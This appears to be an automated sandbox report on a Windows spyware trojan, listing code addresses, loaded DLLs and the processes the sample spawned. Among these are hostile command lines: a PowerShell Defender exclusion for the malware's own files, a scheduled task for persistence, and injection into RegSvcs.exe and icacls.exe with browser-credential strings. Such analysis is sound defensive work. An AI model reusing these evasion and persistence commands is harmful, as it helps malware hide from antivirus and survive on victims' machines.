Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC0535	13_2_02EC0535
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EBEA80	13_2_02EBEA80
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F76BD7	13_2_02F76BD7
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7AB40	13_2_02F7AB40
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EEE8F0	13_2_02EEE8F0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EA68B8	13_2_02EA68B8
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02ECA840	13_2_02ECA840
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC2840	13_2_02EC2840
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC29A0	13_2_02EC29A0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F8A9A6	13_2_02F8A9A6
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02ED6962	13_2_02ED6962
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7EEDB	13_2_02F7EEDB
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7CE93	13_2_02F7CE93
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02ED2E90	13_2_02ED2E90
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC0E59	13_2_02EC0E59
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7EE26	13_2_02F7EE26
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EB2FC8	13_2_02EB2FC8
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F3EFA0	13_2_02F3EFA0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F34F40	13_2_02F34F40
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F62F30	13_2_02F62F30
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F02F28	13_2_02F02F28
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EE0F30	13_2_02EE0F30
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EB0CF2	13_2_02EB0CF2
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F60CB5	13_2_02F60CB5
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC0C00	13_2_02EC0C00
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EBADE0	13_2_02EBADE0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02ED8DBF	13_2_02ED8DBF
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F5CD1F	13_2_02F5CD1F
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02ECAD00	13_2_02ECAD00
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F612ED	13_2_02F612ED
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EDD2F0	13_2_02EDD2F0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EDB2C0	13_2_02EDB2C0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC52A0	13_2_02EC52A0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F0739A	13_2_02F0739A
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EAD34C	13_2_02EAD34C
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7132D	13_2_02F7132D
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7F0E0	13_2_02F7F0E0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F770E9	13_2_02F770E9
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC70C0	13_2_02EC70C0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F6F0CC	13_2_02F6F0CC
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02ECB1B0	13_2_02ECB1B0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EF516C	13_2_02EF516C
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F8B16B	13_2_02F8B16B
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EAF172	13_2_02EAF172
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F716CC	13_2_02F716CC
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F05630	13_2_02F05630
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7F7B0	13_2_02F7F7B0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EB1460	13_2_02EB1460
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7F43F	13_2_02F7F43F
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F895C3	13_2_02F895C3
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F5D5B0	13_2_02F5D5B0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F77571	13_2_02F77571
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F6DAC6	13_2_02F6DAC6
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F05AA0	13_2_02F05AA0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F61AA3	13_2_02F61AA3
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F5DAAC	13_2_02F5DAAC
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F33A6C	13_2_02F33A6C
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F77A46	13_2_02F77A46
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7FA49	13_2_02F7FA49
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F35BF0	13_2_02F35BF0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EFDBF9	13_2_02EFDBF9
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EDFB80	13_2_02EDFB80
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7FB76	13_2_02F7FB76
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC38E0	13_2_02EC38E0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F2D800	13_2_02F2D800
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC9950	13_2_02EC9950
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EDB950	13_2_02EDB950
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F55910	13_2_02F55910
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC9EB0	13_2_02EC9EB0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02E83FD2	13_2_02E83FD2
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02E83FD5	13_2_02E83FD5
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7FFB1	13_2_02F7FFB1
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC1F92	13_2_02EC1F92
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7FF09	13_2_02F7FF09
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F7FCF2	13_2_02F7FCF2
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F39C32	13_2_02F39C32
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EDFDC0	13_2_02EDFDC0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F77D73	13_2_02F77D73
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02EC3D40	13_2_02EC3D40
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02F71D5A	13_2_02F71D5A
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_027022F0	13_2_027022F0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_026FD227	13_2_026FD227
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_026FD230	13_2_026FD230
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_026FD450	13_2_026FD450
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_026FB4D0	13_2_026FB4D0
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02703B60	13_2_02703B60
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02703B19	13_2_02703B19
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02705920	13_2_02705920
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_0271BF20	13_2_0271BF20
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02D336DA	13_2_02D336DA
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02D2E438	13_2_02D2E438
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02D2E553	13_2_02D2E553
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02D2E8F6	13_2_02D2E8F6
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02D2D9B8	13_2_02D2D9B8
Source: C:\Windows\SysWOW64\icacls.exe	Code function: 13_2_02D2CC43	13_2_02D2CC43

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 017AB970 appears 262 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0183F290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 017F5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0182EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01807E54 appears 107 times
Source: C:\Windows\SysWOW64\icacls.exe	Code function: String function: 02F07E54 appears 107 times
Source: C:\Windows\SysWOW64\icacls.exe	Code function: String function: 02F2EA12 appears 86 times
Source: C:\Windows\SysWOW64\icacls.exe	Code function: String function: 02EF5130 appears 58 times
Source: C:\Windows\SysWOW64\icacls.exe	Code function: String function: 02EAB970 appears 262 times
Source: C:\Windows\SysWOW64\icacls.exe	Code function: String function: 02F3F290 appears 103 times

Source: fHkdf4WB7zhMcqP.exe

Static PE information: invalid certificate

Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1789428403.0000000007220000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs fHkdf4WB7zhMcqP.exe
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1776213941.0000000003C61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs fHkdf4WB7zhMcqP.exe
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1793042981.00000000077E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs fHkdf4WB7zhMcqP.exe
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1771823704.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs fHkdf4WB7zhMcqP.exe
Source: fHkdf4WB7zhMcqP.exe	Binary or memory string: OriginalFilenamervfz.exe: vs fHkdf4WB7zhMcqP.exe

Source: fHkdf4WB7zhMcqP.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: fHkdf4WB7zhMcqP.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vssfbkdOErXuYi.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, DKHQQRT9Uy0TIHiZru.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, oCorf3Al2NefSCs3QA.cs	Security API names: _0020.SetAccessControl
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, oCorf3Al2NefSCs3QA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.fHkdf4WB7zhMcqP.exe.77e0000.2.raw.unpack, oCorf3Al2NefSCs3QA.cs	Security API names: _0020.AddAccessRule
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, DKHQQRT9Uy0TIHiZru.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, oCorf3Al2NefSCs3QA.cs	Security API names: _0020.SetAccessControl
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, oCorf3Al2NefSCs3QA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.fHkdf4WB7zhMcqP.exe.3c8d480.0.raw.unpack, oCorf3Al2NefSCs3QA.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/16@16/13

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

File created: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_03
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Mutant created: \Sessions\1\BaseNamedObjects\wARzZWEGGpSWmodhPVp
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

File created: C:\Users\user\AppData\Local\Temp\tmp6426.tmp

Jump to behavior

Source: fHkdf4WB7zhMcqP.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: fHkdf4WB7zhMcqP.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: icacls.exe, 0000000D.00000002.4127000358.0000000002933000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: fHkdf4WB7zhMcqP.exe	ReversingLabs: Detection: 31%
Source: fHkdf4WB7zhMcqP.exe	Virustotal: Detection: 37%

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

File read: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe"
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp91BE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe"	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp91BE.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
